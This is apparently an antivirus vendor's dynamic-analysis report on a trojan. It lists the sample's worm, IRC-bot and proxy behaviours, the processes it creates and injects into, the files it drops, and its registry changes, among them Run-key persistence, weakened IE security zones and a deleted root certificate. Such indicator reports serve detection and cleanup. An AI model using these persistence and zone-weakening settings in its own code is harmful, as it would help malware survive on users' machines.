Trojan.GenericKD.1742492_9cd12e0ded – Adaware

Dynamic Analysis

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot	A bot can communicate with command and control servers via IRC channel.
MSNWorm	A worm can spread its copies through the MSN Messanger.
Trojan-Proxy	This program can launch a proxy server (SOCKS4) on a designated TCP port.

Process activity

The Trojan creates the following process(es):

pwyqire.exe:1312
rep.exe:1920
rep.exe:292
20.exe:464
20.exe:2012
hggjgh.exe:656
hggjgh.exe:1884
systemj.exe:456
system.exe:1088
%original file name%.exe:1036
iexplorer.exe:596

The Trojan injects its code into the following process(es):

pwyqire.exe:500
iexplorer.exe:1652
csrss.exe:492

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process pwyqire.exe:1312 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (1249 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\L43K77.DQ9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)

The process pwyqire.exe:500 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe (588384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe (483032 bytes)
%WinDir%\systemj.exe (589016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (169 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[2].txt (169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4916 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (511 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%WinDir%\system.exe (483944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)

The process rep.exe:1920 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\csrss.exe (5441 bytes)

The process rep.exe:292 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Q32K34.WE9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (1137 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Q32K34.WE9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (0 bytes)

The process 20.exe:464 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (1241 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\I75K82.HU9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (0 bytes)

The process 20.exe:2012 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\iexplorer.exe (5873 bytes)

The process hggjgh.exe:656 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\pwyqire.exe (5441 bytes)

The process hggjgh.exe:1884 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1249 bytes)
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\L43K77.DQ9 (0 bytes)

The process systemj.exe:456 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\J50H\20.exe (9665 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\J50H\__tmp_rar_sfx_access_check_1228515 (0 bytes)

The process system.exe:1088 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\J50H\rep.exe (9665 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\J50H\__tmp_rar_sfx_access_check_1228046 (0 bytes)

The process %original file name%.exe:1036 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\L75C\hggjgh.exe (10537 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\L75C\__tmp_rar_sfx_access_check_1210343 (0 bytes)

The process iexplorer.exe:596 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (1241 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\I75K82.HU9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (0 bytes)

Registry activity

The process pwyqire.exe:1312 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 90 FB 4C EE 3E 1C 7C 5B 86 D9 39 40 9C 0B 6F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process pwyqire.exe:500 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\yOLE]
"Supports RAS Connections" = "pwyqire.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "pwyqire.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\yOLE]
"Supports RAS Connections" = "pwyqire.exe"

[HKLM\System\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "pwyqire.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"systemj.exe" = "SSH, Telnet and Rlogin client"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 79 3D 8F 13 20 DD 0C 8C A0 20 B3 AF 97 EE 49"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 63 66 4B 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"system.exe" = "SSH, Telnet and Rlogin client"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "pwyqire.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "pwyqire.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"2796BAE63F1801E277261BA0D77770028F20EEE4"

The process rep.exe:1920 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 D4 89 6F 45 56 92 C1 03 97 B8 97 DD EF 70 5B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"

The process rep.exe:292 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 A3 82 3C 13 15 F5 26 EB EF 08 AA 91 3B 97 02"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process 20.exe:464 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 6A 91 E2 4B C2 EF 32 5C 8D 8D D5 44 7A 72 0A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process 20.exe:2012 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 32 DF E0 50 A2 CE B2 EE C5 7B 62 75 CD F4 F9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process hggjgh.exe:656 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A F8 D0 5B 9A F7 5E 23 17 7F 5D C9 EE D0 8A 64"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process hggjgh.exe:1884 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 77 9E 18 22 8E D4 FA 76 5A 63 1B 15 52 EC FE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process systemj.exe:456 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 CB 68 CE 4D 08 6D 43 E0 B7 0F BE 56 ED 2C 7A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\J50H]
"20.exe" = "20"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process system.exe:1088 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 C8 F1 49 44 BE 65 19 65 A2 29 C0 6A 22 CB 4B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\J50H]
"rep.exe" = "rep"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:1036 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 77 DF 13 4D B7 DA E3 AB D3 C4 EE 2F 50 0A CD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\L75C]
"hggjgh.exe" = "hggjgh"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
